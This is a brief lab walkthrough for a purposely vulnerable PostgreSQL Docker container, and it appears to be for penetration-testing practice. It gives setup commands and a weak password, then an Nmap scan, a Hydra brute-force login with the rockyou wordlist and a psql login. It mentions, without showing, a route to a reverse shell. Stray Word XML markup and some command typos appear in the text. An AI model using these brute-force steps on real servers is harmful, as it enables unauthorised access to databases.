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Vulnerable_Postgresql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 setup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Pull the docker image from docker-hub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docker pull shaccuri/vuln_postgresql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Run the docker image using the following command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr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  <w:t xml:space="preserve">docker run - -name postgres -e POSTGRES_PASSWORD=iloveyou -d -p 5432:5432 shaccuri/vuln_postgresql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Get the IP address to perform vulnerability testing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Penetration testing Guide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We have the IP address of the server, let’s perform the Nmap scan.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-sC -sV ip_address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Create a user.txt file that contains a few of the default users.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user.txt – postgres, admin, root, psql, postgresql, r00t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We know that port 5432 is running Postgres we can use Metasploit or hydra to perform brute force login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Hydra -L user.txt -P /usr/share/wordlists/rockyou.txt -s 5432 -v -V postgres://ip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We know the password now, we can use this to log in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Psql -h ip -U postgres -W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Password:iloveyou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Now we have logged in we can read files and create files as well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This can be utilized in a web server to execute a reverse shell. Because usually, we have a web server and database together.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